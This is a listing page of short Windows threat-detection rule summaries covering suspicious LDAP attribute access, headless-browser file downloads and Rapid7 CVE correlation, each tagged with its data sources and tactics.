Data Source: Windows

Suspicious Access to LDAP Attributes

Sep 15, 2025 · Domain: Endpoint OS: Windows Use Case: Threat Detection Tactic: Discovery Data Source: Windows Security Event Logs Data Source: Active Directory Data Source: Windows Resources: Investigation Guide ·

Share on:

Identify read access to a high number of Active Directory object attributes. The knowledge of objects properties can help adversaries find vulnerabilities, elevate privileges or collect sensitive information.

Potential File Download via a Headless Browser

Sep 15, 2025 · Domain: Endpoint OS: Windows Use Case: Threat Detection Tactic: Command and Control Resources: Investigation Guide Data Source: Windows Data Source: Elastic Endgame Data Source: Elastic Defend Data Source: Windows Security Event Logs Data Source: Microsoft Defender for Endpoint Data Source: SentinelOne Data Source: Sysmon Data Source: Crowdstrike ·

Share on:

Identifies the use of a browser to download a file from a remote URL and from a suspicious parent process. Adversaries may use browsers to avoid ingress tool transfer restrictions.

Rapid7 Threat Command CVEs Correlation

May 6, 2025 · OS: Windows Data Source: Elastic Endgame Data Source: Windows Data Source: Network Data Source: Rapid7 Threat Command Rule Type: Threat Match Resources: Investigation Guide Use Case: Vulnerability Use Case: Asset Visibility Use Case: Continuous Monitoring ·

Share on:

This rule is triggered when CVEs collected from the Rapid7 Threat Command Integration have a match against vulnerabilities that were found in the customer environment.